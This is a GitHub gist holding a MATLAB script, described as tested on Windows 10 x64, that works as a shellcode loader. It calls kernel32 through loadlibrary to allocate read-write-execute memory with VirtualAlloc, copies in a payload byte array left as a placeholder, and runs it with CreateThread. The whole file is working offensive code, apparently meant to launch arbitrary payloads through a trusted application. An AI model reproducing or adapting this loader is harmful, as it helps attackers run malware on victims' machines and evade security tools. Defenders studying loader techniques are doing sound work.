Last active
September 19, 2023 05:19
-
-
Save Wra7h/573df0297b9f15ce420898ce4f07a3da to your computer and use it in GitHub Desktop.
Matlab Shellcode Loader
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
% Wra7h/FlavorTown | |
% MATLAB version: R2023a | |
% Tested on Win10 x64 | |
if not(libisloaded('kernel32')) | |
loadlibrary('kernel32.dll', @kernel32proto); | |
end | |
if not(libisloaded('msvcrt')) | |
loadlibrary('msvcrt.dll', @msvcrtproto); | |
end | |
%payloadexample = uint8([86, 72, 137, 230,...]); | |
payload = uint8([PAYLOAD HERE]); | |
cbPayload = length(payload); | |
%VirtualAlloc | |
allocationType = bitxor(hex2dec('00001000'), hex2dec('00002000')); | |
protection = hex2dec('00000040'); | |
hAlloc = calllib('kernel32', 'VirtualAlloc', [], cbPayload, allocationType, protection); | |
%Copy payload to RWX memory region | |
calllib('msvcrt', 'memcpy', hAlloc, payload, int64(cbPayload)); | |
%CreateThread | |
hThread = calllib('kernel32', 'CreateThread', [], 0, hAlloc, [], 0, 0); | |
%Close thread handle | |
Ret = calllib('kernel32', 'CloseHandle', hThread ); | |
%Cleanup loaded libraries | |
if libisloaded('kernel32') | |
unloadlibrary('kernel32'); | |
end | |
if libisloaded('msvcrt') | |
unloadlibrary('msvcrt'); | |
end | |
function [fcns, structs, enuminfo] = kernel32proto | |
fcns=[]; structs=[]; enuminfo=[]; fcns.alias=[]; | |
% Prototype for VirtualAlloc | |
fcns.name{1} = 'VirtualAlloc'; | |
fcns.calltype{1} = 'cdecl'; | |
fcns.LHS{1} = 'int64'; | |
fcns.RHS{1} = {'int64Ptr', 'int64', 'uint32', 'uint32'}; | |
% Prototype for CreateThread | |
fcns.name{2} = 'CreateThread'; | |
fcns.calltype{2} = 'cdecl'; | |
fcns.LHS{2} = 'int64'; | |
fcns.RHS{2} = {'voidPtr', 'int64', 'int64', 'voidPtr', 'uint32', 'uint32Ptr'}; | |
% Prototype for CloseHandle | |
fcns.name{3} = 'CloseHandle'; | |
fcns.calltype{3} = 'cdecl'; | |
fcns.LHS{3} = 'int'; | |
fcns.RHS{3} = {'int64'}; | |
end | |
function [fcns,structs,enuminfo] = msvcrtproto | |
fcns=[]; structs=[]; enuminfo=[]; fcns.alias={}; | |
fcns.name{1} = 'memcpy'; | |
fcns.calltype{1} = 'cdecl'; | |
fcns.LHS{1} = 'voidPtr'; | |
fcns.RHS{1} = {'int64', 'uint8Ptr', 'int64'}; | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment